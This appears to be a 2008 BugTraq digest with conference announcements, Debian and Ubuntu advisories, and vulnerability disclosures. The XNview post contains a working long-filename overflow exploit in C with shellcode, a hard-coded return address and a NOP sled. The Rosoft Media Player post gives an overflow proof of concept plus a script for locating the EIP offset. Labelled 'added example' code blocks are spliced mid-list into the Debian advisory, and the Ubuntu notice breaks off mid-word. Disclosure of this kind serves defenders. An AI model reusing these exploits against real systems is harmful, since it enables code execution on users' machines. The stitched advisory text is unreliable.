Black Hat Announcements: New CFP system and Japan '08 confirmed

2008-03-15 Thread jmoss
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

BugTraq readers, here is a big Black Hat update to keep inquiring minds up
to date with all the goings on in our not-so-secret lair:

Black Hat Amsterdam is a go! 

Training: 25-26 March 2008
Briefings: 27-28 March 2008

There will be four different tracks over two days comprising more than 20
internationally renowned security professionals speaking on diverse topics,
from intercepting GSM traffic and the evolution of spam techniques to
attacking Anti Virus products and new client side channels:
https://www.blackhat.com/html/bh-europe-08/bh-eu-08-main.html


Black Hat USA News:
We're very proud to announce a new feature for paid Black Hat attendees
starting with the USA show in August - delegate access to our CFP system!
Paid delegates can now log into our CFP database, read and review our
proposed presentations and share their ratings and comments with Black Hat.

Your ratings will help us create the show you want to attend, and even help
focus presentations as they're being created. We are excited to see what
kind of information we learn about what interests our delegates and what
kind of talks meet their needs best.  We've always said that our delegates
make Black Hat the experience it is, and we're glad to have the opportunity
to extend their influence on the final product. To read more about this new
opportunity, go to:
https://www.blackhat.com/html/blackpages/blackpages.html

We're also unveiling an Un-Track where attendees create their own mash-up
style presentations - so if you've got something to share with the security
community, this is your moment.

Continuing a popular new BH development, we will also have speaker Q&A rooms
after every presentation to help you follow up with your speaker and network
with like-minded delegates. Still have a question that didn't quite get
answered? Follow your speaker and continue the conversation.

Registration is now OPEN for the Black Hat Briefings USA; register now to
take advantage of our early bird rates:

Black Hat Briefings USA 2008, August 2-7 at the Caesars Palace Las Vegas

Early registration rate closes May 1, 2008.

Regular registration rate closes July 1, 2008.
https://www.blackhat.com/html/bh-registration/bh-registration.html#USA

The Black Hat USA Call for Papers is now open. For descriptions of the
tracks and deadlines check out:
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-cfp.html

To create or update a submission:
https://cfp.blackhat.com/

Download all the Black Hat USA 2007 content for free in an iPod friendly
format! For audio and video follow these links:
https://www.blackhat.com/podcast/bh-usa-07-video.rss
https://www.blackhat.com/podcast/bh-usa-07-audio.rss


Black Hat Japan News:
We're happy to announce that Black Hat is returning to Tokyo for another
Black Hat Japan in October 2008. We'll be bringing another strong lineup of
speakers and trainers and the best lineup of technical security
presentations available in Japan. We hope to see you there!

About Black Hat

The Black Hat Briefings are a series of highly technical information
security conferences that bring together thought leaders from all facets of
the infosec world - from the corporate and government sectors to academic
and even underground researchers. The environment is strictly vendor-neutral
and focused on the sharing of practical insights and timely, actionable
knowledge. Black Hat remains the best and biggest event of its kind, unique
in its ability to define tomorrow's information security landscape. 

15 years at the intersection of network security and hacker ingenuity is
what makes Black Hat the one-of-a-kind conference it is, one where the
establishment and the underground are equally at home.

In addition to the large number of short, topical presentations in the
Briefings, Black Hat also provides hands-on, high-intensity, multi-day
Trainings. The Training sessions are provided by some of the most respected
experts in the world and many also provide formal certifications to
qualifying attendees. Arrangements can also be made to bring Black Hat's
trainers to your location for private and customized training.

Subscribe to the Black Hat RSS feed to keep up to date on news,
announcements, and content:
https://www.blackhat.com/BlackHatRSS.xml

UNSUBSCRIBE:
These announcements get sent to past Black Hat attendees. If you wish to
stop receiving them just reply saying so and I'll remove you from the list.

Jeff Moss
Director
Black Hat


-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.7.0 (Build 1012)
Charset: us-ascii

wsBVAwUBR9saXUqsDNqTZ/G1AQjHRAf+Kzu1JM+3uJfDYb4lnTzog1lPcT9bmKhI
Odwbpae5ISCKoJq3LQ20COwPdnEappUSvZPwO8KCfAxtub6eeHDIsKc03AoordGb
T+4V3KFJ2Bp+/lKNySA5X3SX+87VpTgo9kycmHSW6XmsIj+q1UKdHAtxXDhKYOnS
aulcInOm9adjU/Zexzq04om+ojOAEVwnbpPykaqYtEg05Lmn2Rgznm9O1wPOMYyG
blbnU5kWdEjDpeyHDRQlSw3YrtNYfREM0ElT8oztWyxLIqNK+qqMKuARXC8Tqyin
7qaX3U41qfZq6TNlAGzVPzBA6afd39WffWIDXrvUZ8oJ1FvuaHRE1g==
=tDr8
-----END PGP SIGNATURE-----

Local persistent DoS in Windows XP SP2 Taskmgr

2008-03-15 Thread SkyOut

Dear list,

after weeks of being totally ignored by Microsoft I decided to finally release
all information related to a bug that has to do with the Windows XP SP2 Task
Manager. Manipulating a Registry key makes it possible to disable Taskmgr. On
the next startup it will crash with an error message. It is possible to back up
the key and repair the Registry that way, but the attack scenario is clear: a
virus uses this code, the user can't open Taskmgr anymore, and your process is
somehow hidden.

The full information about this bug, can be found here:
http://core-security.net/archive/2008/march/index.php#14032008

And the exploit is available here:
http://core-security.net/releases/exploits/taskmgr_dos.c.txt

Greets,
SkyOut

---
core-security.net
---


[SECURITY] [DSA 1516-1] New dovecot packages fix privilege escalation

2008-03-15 Thread Florian Weimer
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1516-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                           Florian Weimer
March 14, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package: dovecot
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-1199 CVE-2008-1218
Debian Bug : 469457

Prior to this update, the default configuration for Dovecot used by
Debian runs the server daemons with group mail privileges.  This means
that users with write access to their mail directory by other means
(for example, through an SSH login) could read mailboxes owned by
other users for which they do not have direct write access
(CVE-2008-1199).  In addition, an internal interpretation conflict in
password handling has been addressed proactively, even though it is
not known to be exploitable (CVE-2008-1218).

Note that applying this update requires manual action: The
configuration setting mail_extra_groups = mail has been replaced
with mail_privileged_group = mail.  The update will show a
configuration file conflict in /etc/dovecot/dovecot.conf.  It is
recommended that you keep the currently installed configuration file,
and change the affected line.  For your reference, the sample
configuration (without your local changes) will have been written to
/etc/dovecot/dovecot.conf.dpkg-new.

If your current configuration uses mail_extra_groups with a value
different from mail, you may have to resort to the
mail_access_groups configuration directive.

For the stable distribution (etch), these problems have been fixed in
version 1.0.rc15-2etch4.

For the unstable distribution (sid), these problems have been fixed in
version 1.0.13-1.

For the old stable distribution (sarge), no updates are provided.
We recommend that you consider upgrading to the stable distribution.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.dsc
Size/MD5 checksum: 1300 8146ccf246ed64e1ac8c0127489ec798
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15.orig.tar.gz
Size/MD5 checksum:  1463069 26f3d2b075856b1b1d180146363819e6
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.diff.gz
Size/MD5 checksum:   102991 21959fc45cf0f8932fa9eb890791ff39

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_alpha.deb
Size/MD5 checksum:   583482 a0d18885da096140ceb4110d525569d4
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_alpha.deb
Size/MD5 checksum:  1379844 6103bce830848d3f9bb4347f5c9b94f0
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_alpha.deb
Size/MD5 checksum:   621320 48127903af1fe2130cb84c57e5a607ff

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_amd64.deb
Size/MD5 checksum:  1222430 1c2e1ffeb6bf745ed88cde01c62d264a
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_amd64.deb
Size/MD5 checksum:   536634 4f64ed0cc16510e9c3d709342b3c57ca
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_amd64.deb
Size/MD5 checksum:   569588 c17bac715f188f55ae20e5a3c95109b1

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_arm.deb
Size/MD5 checksum:  1123030 47eb9fddcc68c2c213afa10c8e3d8747
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_arm.deb
Size/MD5 checksum:   506134 0f4d939f2cf68f4e5b01140c846e50bc
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_arm.deb
Size/MD5 checksum:   537564 82310ae4e42406429f8ade7cbb81abf0

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_hppa.deb
Size/MD5 checksum:  1298818 603d12284115b6349e1d0334263d2af0
  
http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_hppa.deb
Size/MD5 checksum:   562192 413ac964849698428c1b08e9cc9075bc
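Added example, not part of the Debian advisory and not Dovecot project code: a
Python script that applies the manual configuration change the advisory asks
for (mail_extra_groups = mail becomes mail_privileged_group = mail, any other
mail_extra_groups value is moved to mail_access_groups and flagged for review)
and that can be used to check whether a host still carries the old directive.
The dovecot.conf embedded below is constructed for the example; only the
directive names come from the advisory.

```python
import re

# Constructed sample of an etch-era /etc/dovecot/dovecot.conf, written for
# this example; it is not taken from any real host.
SAMPLE_CONF = """\
# Dovecot configuration file
protocols = imap pop3
mail_location = mbox:~/mail:INBOX=/var/mail/%u
# Needed so dotlock files can be created in /var/mail
mail_extra_groups = mail
ssl_disable = no
"""

# Matches an active (not commented-out) mail_extra_groups line and captures
# the indentation, the value and any trailing comment.
EXTRA_GROUPS = re.compile(r"^(\s*)mail_extra_groups\s*=\s*([^#]*?)\s*(#.*)?$")


def migrate_dovecot_conf(text):
    """Rewrite mail_extra_groups the way the advisory recommends.

    Returns (new_text, findings).  Each finding is (line_number, kind, message):
      "rewrite" - "mail_extra_groups = mail" became "mail_privileged_group = mail"
      "review"  - another value was moved to mail_access_groups, which still
                  grants those groups for the whole session and needs a look
    """
    out, findings = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = EXTRA_GROUPS.match(line)
        if m is None:
            out.append(line)
            continue
        indent, value, comment = m.group(1), m.group(2), m.group(3)
        if not value:                # "mail_extra_groups =" grants nothing
            out.append(line)
            continue
        if value == "mail":
            new = indent + "mail_privileged_group = mail"
            findings.append((lineno, "rewrite",
                             "mail_extra_groups = mail -> mail_privileged_group = mail"))
        else:
            new = indent + "mail_access_groups = " + value
            findings.append((lineno, "review",
                             "mail_extra_groups = %s has no privileged-group "
                             "equivalent; moved to mail_access_groups" % value))
        if comment:
            new += "  " + comment
        out.append(new)
    new_text = "\n".join(out)
    if text.endswith("\n"):
        new_text += "\n"
    return new_text, findings


def still_vulnerable(text):
    """True if an active mail_extra_groups line is still present."""
    return any(EXTRA_GROUPS.match(line) for line in text.splitlines())


if __name__ == "__main__":
    new_conf, found = migrate_dovecot_conf(SAMPLE_CONF)
    for lineno, kind, msg in found:
        print("line %d [%s]: %s" % (lineno, kind, msg))
    print(new_conf)
```

Run it against the kept /etc/dovecot/dovecot.conf after resolving the dpkg
conflict; a "review" finding means the host relied on extra groups beyond
mail and the group grant has only been renamed, not narrowed.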
  

Troopers08 Security Conference, April 23/24 (Munich/Germany)

2008-03-15 Thread Enno Rey
Troopers08 Presentations


Keynote on Invulnerable Software - Dan Bernstein

KIDS - Kernel Intrusion Detection System - Rodrigo Branco

State of Security - Andrew Cushman, Microsoft

Release of the next revision of the free Exploit-Me series of application 
penetration testing tools - Nish Bhalla, Security Compass

Side Channel Analysis - Job de Haas, Riscure

Hackertools according to German law (§ 202c StGB) - Horst Speichert, Lawyer

Hardening Oracle in Corporate Environments - Alexander Kornbrust, 
Red-Database-Security

Virtualization: There is no spoon - Michael Kemp

Straight Talk about Cryptography - Jon Callas, PGP

Evilgrade: You have pending upgrades - Francisco Amato

Self defending networks - hype or essential need for international 
organisations? - Rolf Strehle, VOITH AG

Keynote Virtualization: Floor Wax, Dessert Topping and The End of Information 
Security As We Know It? - Christopher Hoff, Unisys

GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft

Incident Management - tasks and organization. - Volker Kozok, German Ministry 
of Defense

A penetration testing learning kit - Ariel Waissbein, Core Security

Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College

Hacking Second Life(TM) - Michael Thumann, ERNW GmbH

Enterprise Web Application Security [EMAIL PROTECTED] S.E. - Dr. Johannes Raab &
Thomas Stocker, Allianz S.E.

Tapping $$$ Enterprises - Pierre Kroma

Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim

SCADA and National Critical Infrastructures: is security an optional? - Raoul 
Chiesa

Data Loss Protection - Hope or Hype. - Enno Rey & Angus Blitter


--

Additional Pre-Con Latenight Talks
PacketWars
Evening Fun

thanks,

-- 
Enno Rey



ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey


[USN-586-1] mailman vulnerability

2008-03-15 Thread Kees Cook
===========================================================
Ubuntu Security Notice USN-586-1             March 15, 2008
mailman vulnerability
CVE-2008-0564
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mailman 2.1.5-9ubuntu4.2

Ubuntu 6.10:
  mailman 1:2.1.8-2ubuntu2.1

Ubuntu 7.04:
  mailman 1:2.1.9-4ubuntu1.2

Ubuntu 7.10:
  mailman 1:2.1.9-8ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

NOTE: Due to an internal release testing mistake, earlier
published mailman versions 1:2.1.9-4ubuntu1.1 (for Ubuntu
7.04) and 1:2.1.9-8ubuntu0.1 (for Ubuntu 7.10) accidentally
included an incorrect patch and caused a regression, as reported in
https://launchpad.net/bugs/202332

This update includes fixes for the problem.  We apologize for the
inconvenience.

Details follow:

Multiple cross-site scripting flaws were discovered in mailman.
A malicious list administrator could exploit this to execute arbitrary
JavaScript, potentially stealing user credentials.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.diff.gz
  Size/MD5:   231090 d3e7124adf9454e2754e41c98df1a79c

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.dsc
  Size/MD5:  626 0ac6344f31b1fd756ff3c724a059c907

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5.orig.tar.gz
  Size/MD5:  5745912 f5f56f04747cd4aff67427e7a45631af

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_amd64.deb
  Size/MD5:  6613254 72d9727b248c5e8ac1ffe6699989b546

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_i386.deb
  Size/MD5:  6612872 6fa80a2c5f9fb4ef86fc37f5948eb7ea

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_powerpc.deb
  Size/MD5:  6621726 45ad75a62c903f80ccaed21d8bff8e0f

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_sparc.deb
  Size/MD5:  6620818 7dc3bc18e981e78fa7d9e18bda151ecc

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.diff.gz
  Size/MD5:   203009 ee4a019ea676c82f040bad51a13f2a04

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.dsc
  Size/MD5:  819 53355a3ca08c288d785123da51dbb10e

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8.orig.tar.gz
  Size/MD5:  6856039 b9308ea3ffe8dd447458338408d46bd6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_amd64.deb
  Size/MD5:  8017888 34628b56f38515676c840c10f2aa100d

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_i386.deb
  Size/MD5:  8016276 18b60f0774f2f664d5505391834ed0c6

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_powerpc.deb
  Size/MD5:  8025122 20b2783ab25dd270751211463fdedc77

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_sparc.deb
  Size/MD5:  8023672 02dd507266718e196abef08311a995b5

Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.diff.gz
  Size/MD5:   142531 2e32aeebcbf3d45e498d4241bf1cf0c8

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.dsc
  Size/MD5:  981 0c8c78087bcf0213f17013c94fea9764

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9.orig.tar.gz
  Size/MD5:  7829201 dd51472470f9eafb04f64da372444835

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_amd64.deb
  Size/MD5:  8606862 74502c6c9e9a8bb277c6f741abd46541

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_i386.deb
  Size/MD5:  8605384 46330ecad45d07957ac827e5f8e944e2

  powerpc architecture (Apple 

Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

2008-03-15 Thread opexoc
Description:

This is nothing special - there is just a flaw in Rosoft Media Player 4.1.8,
similar to the one discovered by Juan Pablo Lopez Yacubian.

This one concerns RML files. It is a Stack Based Buffer Overflow vulnerability -
we can overwrite EIP. I hope that it was not reported before.


Author: Wiktor Sierociński

POC:


#!/usr/bin/python
# Writes an RML playlist whose entry is 5000 'A' bytes; opening it in
# Rosoft Media Player 4.1.8 overflows a stack buffer and overwrites EIP.

content = (
    "#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)

fd = open("music.rml", "w")
fd.write(content)
fd.close()

print("RML FILE CREATED")
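Added example, not part of the original post: the proof of concept above shows
that 5000 'A' bytes reach EIP but not at which offset. The script below swaps
the filler for a Metasploit-style cyclic pattern, in which every 4-byte window
is unique, and provides the inverse lookup from the value the debugger shows
in EIP back to the offset in the file. The "#EXTINF:Played=0" framing is taken
from the proof of concept; everything else about the RML layout, and the EIP
value used in the __main__ demonstration, are assumptions made for the example.

```python
import string

# Playlist line the original proof of concept puts in front of the overflowing
# string. Assumed here to be the only framing the player needs; the RML
# format itself is not documented on the page.
RML_HEADER = b"#EXTINF:Played=0\n"

UPPER = string.ascii_uppercase.encode()
LOWER = string.ascii_lowercase.encode()
DIGITS = string.digits.encode()
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes


def cyclic_pattern(length):
    """Return `length` bytes of the Aa0Aa1Aa2...Ab0 pattern.

    Every 4-byte window is unique within the first MAX_UNIQUE bytes, so the
    value that lands in EIP identifies the offset that reached it.
    """
    if length > MAX_UNIQUE:
        raise ValueError("pattern is only unique up to %d bytes" % MAX_UNIQUE)
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += bytes((u, l, d))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip, length=MAX_UNIQUE):
    """Offset of the 4 bytes that reached EIP, or -1 if not from the pattern.

    `eip` is either the 4 raw bytes or the integer shown by the debugger,
    which on x86 is the little-endian reading of those bytes.
    """
    if isinstance(eip, int):
        eip = eip.to_bytes(4, "little")
    return cyclic_pattern(length).find(eip)


def build_rml(payload):
    """RML file body: the header line, then the payload as the entry's value."""
    return RML_HEADER + payload + b"\n"


def write_rml(path, length=5000):
    """Write an RML file carrying `length` bytes of pattern; returns file size."""
    data = build_rml(cyclic_pattern(length))
    with open(path, "wb") as fd:
        fd.write(data)
    return len(data)


if __name__ == "__main__":
    write_rml("music.rml")
    # Constructed debugger value, not a measured one: 0x37634136 is the
    # little-endian reading of b"6Ac7", which sits at offset 80 of the pattern.
    print(pattern_offset(0x37634136))
```

Open the generated music.rml in the player under a debugger, read EIP at the
crash, and pass that value to pattern_offset(); a result of -1 means the
crash value did not come from the pattern and the overwrite is indirect.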

 


XNview 1.92.1 Long Filename Overflow

2008-03-15 Thread Sylvain

*XNview*


Information :
**************
Version : 1.92.1
Website : http://www.xnview.com/
Problem : Long Filename Overflow


Description:

XnView is an efficient multimedia viewer, browser, and converter. It supports
more than 400 graphic file formats (PNG, JPEG, TARGA, TIFF, GIF, BMP, and
more).

Details :
*********
The problem is that XNview doesn't handle long file names. It results in an
exploitable buffer overflow which allows execution of arbitrary code.

POC:

#include <windows.h>
#include <unistd.h>
#include <string.h>

/*
Shellcode
Size=164 octets
Action: open calc.exe
*/
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16"
"\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1"
"\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd"
"\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99"
"\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2"
"\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0"
"\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f"
"\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc"
"\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90"
"\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec"
"\x73\x77\x0b\x94";

/*
user32.dll ret address == jmp ebp
under Win XP pro SP2
*/
unsigned char ret[] = "\x34\x59\x40\x7e";


int main(int argc, char *argv[]) {
    char *bufExe[3];
    char buf[512];                       /* 511 filler bytes plus terminating NUL */
    bufExe[0] = "xnview.exe";
    bufExe[2] = NULL;
    memset(buf, 0x90, 511);              /* NOP sled as the long file name */
    buf[511] = '\0';                     /* keep argv[1] a proper C string */
    memcpy(&buf[260], ret, 4);           /* saved return address -> jmp ebp */
    memcpy(&buf[330], shellcode, sizeof(shellcode) - 1);  /* without the NUL */
    bufExe[1] = buf;

    execve(bufExe[0], bufExe, NULL);     /* pass the long name as argv[1] */
    return 0x0;
}

Disclosure Timeline:

04 February 2008 - Discovery
12 February 2008 - Vendor notification
13 February 2008 - Vendor reply
14 March 2008 - Release of XNview 1.93.1
15 March 2008 - Public Disclosure

Credits:

Author : Sylvain THUAL
Original advisory(French) : 
http://www.click-internet.fr/index.php?cki=News&news=9
E-mail : [EMAIL PROTECTED]
Website : http://www.click-internet.fr